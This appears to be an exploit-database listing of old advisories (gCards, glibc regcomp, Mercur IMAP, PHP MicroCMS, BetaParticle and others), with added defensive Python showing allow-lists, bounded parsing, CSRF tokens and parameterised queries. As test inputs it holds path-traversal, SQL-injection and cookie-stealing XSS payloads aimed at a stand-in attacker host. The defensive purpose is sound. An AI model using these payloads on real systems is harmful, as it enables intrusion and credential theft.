Explore all Exploits:

gCards <= 1.45 multiple vulnerabilities

gCards 1.45 and prior are vulnerable to local file inclusion and SQL injection. The local file inclusion exists because the 'setLang' parameter of the 'inc/setLang.php' script is not sanitized before it is used to build an include path; directory traversal sequences in the parameter cause arbitrary local files to be included. The SQL injection exists because the 'username' parameter of the 'admin/loginfunction.php' script is not sanitized before it is placed in a query, so injected SQL can alter the login query.
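The check that is missing in the 'setLang' pattern above is a strict allow-list on the value before it reaches the include, backed by a containment test on the resolved path. The following is an added example written for this page, not gCards code; the language directory, the file naming scheme and the sample values are assumptions constructed for the demonstration. The unsafe function reproduces the traversal so the two can be compared side by side.

```python
# Added example, not gCards code: validating a language-selector value before it
# becomes part of an include path, as the missing check for the 'setLang' pattern.
# LANG_DIR and the file naming scheme are assumptions for the demonstration.
import posixpath
import re

LANG_DIR = "/var/www/app/lang"                     # assumed location of language files
LANG_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")  # accepted codes, e.g. "en", "pt_BR"


def unsafe_lang_path(lang: str) -> str:
    """Vulnerable pattern: the parameter is spliced straight into the path, so
    '../' sequences walk out of LANG_DIR (what the advisory describes)."""
    return posixpath.normpath(posixpath.join(LANG_DIR, lang + ".php"))


def escapes_base(path: str) -> bool:
    """True when a normalised path lies outside LANG_DIR."""
    return posixpath.commonpath([LANG_DIR, path]) != LANG_DIR


def safe_lang_path(lang: str):
    """Hardened: a strict allow-list on the value, then a containment check on
    the resolved path as a second layer. Returns None when the value is rejected."""
    if not LANG_RE.fullmatch(lang):
        return None
    candidate = posixpath.normpath(posixpath.join(LANG_DIR, lang + ".php"))
    if escapes_base(candidate):
        return None
    return candidate


# Constructed sample values: two legitimate codes and several attack strings.
SAMPLES = ["en", "pt_BR", "../../../../etc/passwd", "../config", "en\x00", "EN"]

if __name__ == "__main__":
    for s in SAMPLES:
        u = unsafe_lang_path(s)
        print(f"{s!r:>28}  unsafe -> {u} ({'ESCAPES' if escapes_base(u) else 'inside'})"
              f"  safe -> {safe_lang_path(s)}")
```

The allow-list does the real work; the `commonpath` test is there so that a later loosening of the pattern cannot silently reopen the traversal. Note that the embedded NUL in `"en\x00"`, which would truncate the `.php` suffix in older PHP include handling, is rejected by the allow-list before any path is built.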

GNU libc/regcomp(3) Multiple Vulnerabilities

The GNU C library (glibc) is the C library of the GNU system and of most systems based on the Linux kernel. regcomp() compiles a regular expression into a form suitable for subsequent regexec() searches. The problem lies in glibc's regcomp(3) implementation. When the pattern contains '{', the token type is OP_OPEN_DUP_NUM and parse_dup_op() is called to parse repetition operators such as '*', '+' and '{1,3}'. fetch_number() converts the numeric bound of an interval. If the value exceeds RE_DUP_MAX, an overflow results.
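To make the bound concrete, here is an added example (not glibc code) of a parser for the '{m}', '{m,}', '{,n}' and '{m,n}' interval forms in which the RE_DUP_MAX check is applied while the digits are being accumulated, so the count can never grow past the limit before it is tested. 0x7fff is glibc's RE_DUP_MAX; the use of -2 as an "oversized" marker and the mapping of failures to POSIX error names are this example's own conventions, chosen for illustration.

```python
# Added example, not glibc code: a bounded interval parser showing where the
# RE_DUP_MAX check belongs. The -2 marker and the error-name mapping are
# conventions chosen for this illustration, not a description of glibc internals.

RE_DUP_MAX = 0x7FFF   # glibc's value; POSIX only requires at least 255


def fetch_number(s: str, i: int):
    """Read a decimal bound starting at s[i].
    Returns (value, next_index): value is None when no digits were present and
    -2 when the digits exceed RE_DUP_MAX. The bound is enforced on every digit,
    so the accumulator never holds a value larger than RE_DUP_MAX."""
    num = None
    while i < len(s) and s[i].isdigit():
        d = ord(s[i]) - ord("0")
        if num is None:
            num = d
        elif num != -2:
            num = num * 10 + d
            if num > RE_DUP_MAX:
                num = -2      # too large: keep consuming digits, remember the error
        i += 1
    return num, i


def parse_dup_op(s: str, i: int):
    """Parse an interval with s[i] == '{'. Returns ((min, max), next_index);
    max is None for an unbounded '{m,}'. Raises ValueError for malformed or
    oversized bounds (REG_BADBR / REG_EBRACE in POSIX terms)."""
    assert s[i] == "{"
    start, i = fetch_number(s, i + 1)
    if i < len(s) and s[i] == ",":
        end, i = fetch_number(s, i + 1)
        if start is None:
            start = 0                     # '{,n}' is treated as 0..n
    else:
        end = start                       # '{m}' means exactly m
        if start is None:
            raise ValueError("REG_BADBR: no bound in interval")
    if i >= len(s) or s[i] != "}":
        raise ValueError("REG_EBRACE: unterminated interval")
    if start == -2 or end == -2:
        raise ValueError("REG_BADBR: bound exceeds RE_DUP_MAX")
    if end is not None and start > end:
        raise ValueError("REG_BADBR: min greater than max")
    return (start, end), i + 1


def check_interval(pattern: str):
    """Parse the first interval in `pattern`; return the bounds or the error text."""
    try:
        bounds, _ = parse_dup_op(pattern, pattern.index("{"))
        return bounds
    except ValueError as e:
        return str(e)


if __name__ == "__main__":
    # Constructed sample patterns, including bounds at and beyond RE_DUP_MAX.
    for p in ["a{1,3}", "a{5}", "a{2,}", "a{,4}", "a{32767}", "a{32768}",
              "a{99999999999999999999,3}", "a{3,1}", "a{1"]:
        print(f"{p:<28} -> {check_interval(p)}")
```

The point of testing inside the loop rather than after it is that a C implementation accumulating into a fixed-width integer would otherwise wrap before any comparison against RE_DUP_MAX takes place; an oversized bound has to be rejected as a parse error, never passed on as a repetition count.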

Mercur Messaging 2005 IMAP (5.0 SP3) DoS Exploit

Tim Taylor has discovered a vulnerability in Mercur Messaging 2005 that can be exploited by unauthenticated and authenticated remote users to cause a denial of service or to compromise a vulnerable system. The vulnerability is caused by boundary errors in the handling of IMAP commands: overly long arguments to the LOGIN and SELECT commands trigger a stack-based buffer overflow, and other commands may also be affected. Successful exploitation allows arbitrary code execution. The vulnerability has been confirmed in version 5.0 SP3; other versions may also be affected.
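Two things a practitioner wants from an advisory like this are a way to reproduce the trigger condition in a lab and a way to spot it in traffic. The following is an added example, not the published exploit: it builds a CRLF-terminated IMAP command line with a single oversized argument (nothing is sent) and flags LOGIN or SELECT lines whose argument exceeds a length limit. The limit and the sample client lines are constructed for the demonstration and are not taken from the advisory.

```python
# Added example, not the Mercur exploit: builds the kind of oversized LOGIN/SELECT
# argument the advisory describes (for a lab probe; nothing is sent here) and flags
# such commands in captured IMAP traffic. The length limit and sample lines are constructed.
import re

IMAP_CMD_RE = re.compile(r"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")
# One argument: a quoted string (with backslash escapes) or a run of non-space bytes.
ARG_RE = re.compile(r'"(?:[^"\\]|\\.)*"|\S+')


def build_probe(tag: str, command: str, arg_len: int, filler: bytes = b"A") -> bytes:
    """One CRLF-terminated IMAP command line with a single argument of arg_len bytes.
    LOGIN takes two arguments, so a dummy password keeps the line well-formed."""
    arg = filler * arg_len
    cmd = command.upper().encode()
    if cmd == b"LOGIN":
        return b"%s LOGIN %s x\r\n" % (tag.encode(), arg)
    return b"%s %s %s\r\n" % (tag.encode(), cmd, arg)


def flag_long_args(lines, limit=256, commands=("LOGIN", "SELECT")):
    """Return (tag, command, longest_argument_length) for every client line whose
    command is in `commands` and carries an argument longer than `limit` bytes."""
    hits = []
    for line in lines:
        m = IMAP_CMD_RE.match(line.rstrip("\r\n"))
        if not m:
            continue
        cmd = m.group("cmd").upper()
        if cmd not in commands:
            continue
        args = ARG_RE.findall(m.group("args") or "")
        longest = max((len(a) for a in args), default=0)
        if longest > limit:
            hits.append((m.group("tag"), cmd, longest))
    return hits


# Constructed sample of client-side IMAP lines as a capture tool might show them.
SAMPLE_LINES = [
    "a001 LOGIN alice secret",
    "a002 SELECT INBOX",
    "a003 LOGIN " + "A" * 1200 + " x",
    "a004 SELECT " + "B" * 600,
    "a005 NOOP",
    'a006 LOGIN "bob smith" pass',
]

if __name__ == "__main__":
    for hit in flag_long_args(SAMPLE_LINES):
        print("suspicious IMAP command:", hit)
    print(build_probe("p1", "SELECT", 16))
```

Quoted strings are kept whole so that a legitimate `LOGIN "bob smith" pass` is measured as two arguments rather than three, and the command list is a parameter because the advisory notes that commands other than LOGIN and SELECT may be affected.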

CSRF and XSS in PHP MicroCMS

Two issues exist in the administration interface. First, the 'index.php?admin=my_account' script does not verify the source of the HTTP request (cross-site request forgery): an attacker who gets a logged-in administrator to visit a crafted page can submit the form from the victim's browser and change the administrator password, compromising the application. Second, the 'index.php?admin=static_pages_edit&pk=home' script does not sanitize the user-supplied 'page_text' variable, allowing script injection (cross-site scripting). Successful exploitation could result in theft of cookie-based authentication credentials and disclosure or modification of sensitive data.
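Both issues above come down to a missing check before a state change and a missing encoding step before output. The following is an added example written for this page, not PHP MicroCMS code: a per-session anti-CSRF token compared in constant time together with an Origin/Referer check, and HTML-escaping of the 'page_text' field. The site origin, the session dictionary and the form field name are assumptions made for the demonstration.

```python
# Added example, not PHP MicroCMS code: the two checks the advisory says are
# missing, in Python for illustration. SITE_ORIGIN, the session store and the
# form field name are assumptions for the demonstration.
import hmac
import html
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://cms.example.test"   # assumed deployment origin


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) a random token bound to the session; embed it as a hidden
    field in every admin form that changes state."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def request_is_same_origin(headers: dict) -> bool:
    """Reject cross-site requests by Origin, falling back to Referer. A missing
    header is treated as cross-site, which is the safe default for admin actions."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def verify_state_change(session: dict, form: dict, headers: dict) -> bool:
    """Gate for handlers such as 'admin=my_account': the submitted token must match
    the session token (constant-time compare) and the request must be same-origin."""
    token = session.get("csrf")
    submitted = form.get("csrf_token", "")
    if not token or not submitted:
        return False
    if not hmac.compare_digest(token, submitted):
        return False
    return request_is_same_origin(headers)


def render_page_text(page_text: str) -> str:
    """Escape 'page_text' for an HTML body or attribute context so injected markup
    is displayed rather than executed. (If rich text is required, an allow-list
    HTML sanitiser takes this function's place.)"""
    return html.escape(page_text, quote=True)


if __name__ == "__main__":
    # Constructed requests: one legitimate, one forged from another origin.
    session = {}
    token = issue_csrf_token(session)
    legit = ({"csrf_token": token}, {"Origin": SITE_ORIGIN})
    forged = ({"csrf_token": "guess"}, {"Origin": "https://attacker.example"})
    print("legit allowed:", verify_state_change(session, *legit))
    print("forged allowed:", verify_state_change(session, *forged))
    print(render_page_text('<script>document.location="https://attacker.example/?"+document.cookie</script>'))
```

The origin check alone is not sufficient (some clients omit the headers), and the token alone does not protect against a token leaked by the XSS on the same site, which is why both are applied and why the output encoding matters for the CSRF defence as well.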

Python <= 2.4.2 realpath() Local Stack Overflow

Python 2.4.2 and earlier are vulnerable to a local stack overflow in realpath(). This exploit works against systems with VA space randomization (ASLR) enabled. The bug was found, and the exploit developed, by dx/vaxen (Gotfault Security) and posidron (Tripbit Research Group). The exploit creates a directory with an overly long path name and then runs a Python script from inside that directory; the script carries the shellcode, which is then executed.

BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability

BetaParticle Blog 6.0 and prior are vulnerable to remote SQL injection. The application does not properly sanitize user-supplied input to the 'fldGalleryID' parameter of the 'template_gallery_detail.asp' script. An attacker can send a specially crafted HTTP request containing SQL statements to the vulnerable script; successful exploitation grants access to the blog's admin panel.
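The gCards 'username' injection and the BetaParticle 'fldGalleryID' injection above are the two common shapes of the bug: a string parameter inside quotes, and a numeric parameter with no quotes at all. The following added example (not code from either project) runs both, each built by string concatenation beside its parameterised form, against an in-memory SQLite database so the bypass can be watched succeeding on one and failing on the other. Table names, columns and rows are constructed for the demonstration; SQLite is used in place of the applications' real database engines.

```python
# Added example, not gCards or BetaParticle code: the two injection shapes from
# the advisories above, vulnerable and parameterised, against constructed data.
# Table and column names are assumptions; SQLite stands in for the real engines.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with one admin account and one hidden gallery row."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admins(username TEXT, password TEXT);
        INSERT INTO admins VALUES ('admin', 'correct horse');
        CREATE TABLE gallery(id INTEGER, title TEXT, hidden INTEGER);
        INSERT INTO gallery VALUES (1, 'Public', 0), (2, 'Private', 1);
    """)
    return con


def login_unsafe(con, username: str, password: str) -> bool:
    """Vulnerable string parameter (the 'username' pattern): a quote in the input
    closes the literal and the rest becomes SQL."""
    sql = f"SELECT 1 FROM admins WHERE username='{username}' AND password='{password}'"
    return con.execute(sql).fetchone() is not None


def login_safe(con, username: str, password: str) -> bool:
    """Hardened: bound parameters; the input can never change the query's shape."""
    sql = "SELECT 1 FROM admins WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def gallery_unsafe(con, gallery_id: str):
    """Vulnerable numeric parameter (the 'fldGalleryID' pattern): no quotes around
    the value, so the attacker needs no quote either."""
    sql = f"SELECT title FROM gallery WHERE id={gallery_id} AND hidden=0"
    return [row[0] for row in con.execute(sql)]


def gallery_safe(con, gallery_id: str):
    """Hardened: validate the type up front, then bind the integer."""
    if not gallery_id.isdigit():
        return []
    sql = "SELECT title FROM gallery WHERE id=? AND hidden=0"
    return [row[0] for row in con.execute(sql, (int(gallery_id),))]


if __name__ == "__main__":
    con = make_db()
    # Constructed payloads: a comment to drop the password clause, and an OR to
    # widen a numeric WHERE so the hidden row comes back.
    print("login bypass, unsafe:", login_unsafe(con, "admin' --", "wrong"))
    print("login bypass, safe:  ", login_safe(con, "admin' --", "wrong"))
    print("gallery dump, unsafe:", gallery_unsafe(con, "2 OR 1=1"))
    print("gallery dump, safe:  ", gallery_safe(con, "2 OR 1=1"))
```

The numeric case is worth noting because the "escape quotes" fix that many applications of this era applied does nothing for it; only a type check or a bound parameter closes it.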

KnowledgebasePublisher 1.2 Remote Code Execution Exploit

This exploit executes arbitrary code on a server running KnowledgebasePublisher 1.2. It abuses a vulnerability in the PageController.php file, where the 'dir' parameter is not sanitized and attacker-supplied code can be injected through it. The exploit sends a single GET request with the payload in 'dir' to the vulnerable server, which executes the injected code.

Crossfire-Server <= 1.9.0 "SetUp()" Remote Buffer Overflow

This exploit targets a remote buffer overflow in the SetUp() routine of Crossfire-Server 1.9.0 and earlier. An attacker can execute arbitrary code on the vulnerable system by sending a specially crafted packet to the server. The exploit uses a jmp *%eax instruction as a trampoline into the shellcode, which is either a bind shell or a connect-back shell.
